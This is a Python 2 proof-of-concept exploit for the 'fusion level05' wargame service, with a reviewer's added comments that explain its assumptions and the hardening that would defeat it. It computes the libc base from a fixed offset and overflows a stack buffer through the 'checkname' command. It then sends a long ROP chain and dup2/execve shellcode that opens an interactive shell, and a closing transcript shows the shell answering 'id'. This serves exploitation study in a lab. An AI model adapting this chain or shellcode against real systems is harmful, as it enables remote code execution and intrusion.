
@soez
Created December 7, 2014 21:55
2fusion-level05.py
# -*- encoding: utf-8 -*-
# Proof-of-concept exploit script for the "level05" exercise (file name:
# 2fusion-level05.py). Written for Python 2: it uses `print` statements and
# treats str literals as raw bytes, so it does not run unmodified on Python 3.
#
# Defender's reading of the assumptions this script depends on (hedged where
# the code itself does not show them):
#   - a constant distance between the application's mapping and libc
#     (OFFSET_TO_LIBC), so one known address locates both; presumably the
#     "offset2lib" observation credited in the header below -- confirm.
#   - an overflow of a stack buffer reached through the "checkname" command,
#     with 44 bytes of filler before the saved return address (inferred from
#     the payload layout; a stack canary would sit in that gap).
#   - stack-resident shellcode entered via a "jmp esp" gadget (author's label
#     on the last chain entry), i.e. the stack is executable at that point.
# Each of these is what the usual hardening (independent PIE base
# randomization, stack protector, non-executable stack) is meant to remove.
from amnesia import *            # provides amnesiaSocket (third-party helper; the wildcard import hides its origin)
from struct import pack, unpack  # NOTE(review): unpack is imported but never used in this file
import time, sys                 # NOTE(review): sys is imported but never used in this file
##################################################################################
# Exploit configuration parameters.. Must be adjusted to the target system and app.
# All three values are environment-specific (the author names Ubuntu 11.10);
# nothing below validates them, so a wrong value simply fails at the target.
OFFSET_SAVED_EIP = 0xb7ffc848                # a previously observed saved return address (how it was obtained is not shown here)
PAGE_NUMBER_OF_NEXT_INSTRUCTION_TO_CALL = 2  # pages to step back from that address to reach the app base (see app_base)
OFFSET_TO_LIBC = 0x1a9000                    # assumed fixed distance app base -> libc base for this target
# Ubuntu 11.10
# Congrats to Hector Marco-Gisbert ∗ & Ismael Ripoll
# {hecmargi,iripoll}@upv.es // http://cybersecurity.upv.es
##################################################################################
s = amnesiaSocket("192.168.1.11", 20005)  # target host/port (lab address, hard-coded)
print s.readLine()                         # service banner (see the transcript comment at the end of the file)
print "[+] Obteniendo app base.."          # Spanish: "Obtaining app base.."
# Page-align the saved EIP (clear the low 12 bits) and step back N pages (N << 12).
app_base = (OFFSET_SAVED_EIP &~ 0xfff) - (PAGE_NUMBER_OF_NEXT_INSTRUCTION_TO_CALL << 12)
print "[+] App Base en 0x%08x" % app_base  # "App base at"
base = (int(app_base) - OFFSET_TO_LIBC)    # libc base by pure subtraction -- no leak from the target, no sanity check
print "[+] Libc Base en 0x%08x" % base     # "Libc base at"
# Second-stage payload. Per the author's labels: a dup2() loop (presumably to
# attach the shell's stdio to the connection -- confirm) followed by a
# shell-spawning stub; 16 NOP bytes pad the end.
shellcode = "\x6a\x08\x5b\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8" # dup2 by Nox & soez
shellcode += "\x31\xc0\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" # shellcode by Nox
shellcode += "\x90" * 16
print "[+] Envio checkname.."  # "Sending checkname.."
# One write: the command word, 44 filler bytes up to the saved return address,
# then a chain of 32-bit little-endian values (the author's trailing comments
# name the gadget each one points at; the two entries that are not base-relative
# are absolute addresses and therefore the most target-specific part), a 4-byte
# NOP pad and the shellcode. No response is read or checked before the sleep.
s.write("checkname " + "A"*44 + pack("<L", base + 0x768e1) # ret ;;
+ pack("<L", base + 0x1a9e) # pop edx ;;
+ pack("<L", 0xffffffff) # -0x1
+ pack("<L", base + 0x115e77) # inc edx ;;
+ pack("<L", base + 0x115e77) # inc edx ;;
+ pack("<L", base + 0x115e77) # inc edx ;;
+ pack("<L", base + 0x115e77) # inc edx ;;
+ pack("<L", base + 0x115e77) # inc edx ;;
+ pack("<L", base + 0x115e77) # inc edx ;;
+ pack("<L", base + 0x115e77) # inc edx ;;
+ pack("<L", base + 0x115e77) # inc edx ;;
+ pack("<L", base + 0x238df) # pop eax ;;
+ pack("<L", base + 0x54) # [0x1000]
+ pack("<L", base + 0x3d527) # mov ecx [eax+0x3c] ; mov eax [eax+0x40] ;;
+ pack("<L", base + 0x18f4e) # pop ebx ;;
+ pack("<L", 0xb801bfff) # &buffer (absolute, not base-relative)
+ pack("<L", base + 0x328e0) # xor eax eax ;;
+ pack("<L", base + 0x7cc70) # add eax 0x1 ;;
+ pack("<L", base + 0x7cc72) # add ebx eax ; add eax 0x2 ;;
+ pack("<L", base + 0x328e0) # xor eax eax ;;
+ pack("<L", base + 0x7cca8) # add eax 0xf ;;
+ pack("<L", base + 0x7cca8) # add eax 0xf ;;
+ pack("<L", base + 0x7cca8) # add eax 0xf ;;
+ pack("<L", base + 0x7cca8) # add eax 0xf ;;
+ pack("<L", base + 0x7cca8) # add eax 0xf ;;
+ pack("<L", base + 0x7cca8) # add eax 0xf ;;
+ pack("<L", base + 0x7cca8) # add eax 0xf ;;
+ pack("<L", base + 0x7cca8) # add eax 0xf ;;
+ pack("<L", base + 0x7cc80) # add eax 0x5 ;;
+ pack("<L", 0xb7fdb0c0) # int 0x80 ;; (absolute, not base-relative)
+ pack("<L", base + 0x1458db) # jmp esp ;;
+ "\x90"*4 + shellcode)
time.sleep(0.5)   # fixed delay before switching modes; nothing confirms the target processed the write
s.interactive()   # presumably relays the socket to the terminal (the transcript below shows "id" answered) -- confirm in amnesia
# from gdb
# ** welcome to level05 **
#
# [+] Obteniendo app base..
# [+] App Base en 0xb7ffa000
# [+] Libc Base en 0xb7e51000
# [+] Envio checkname..
# id
# uid=20005 gid=20005 groups=20005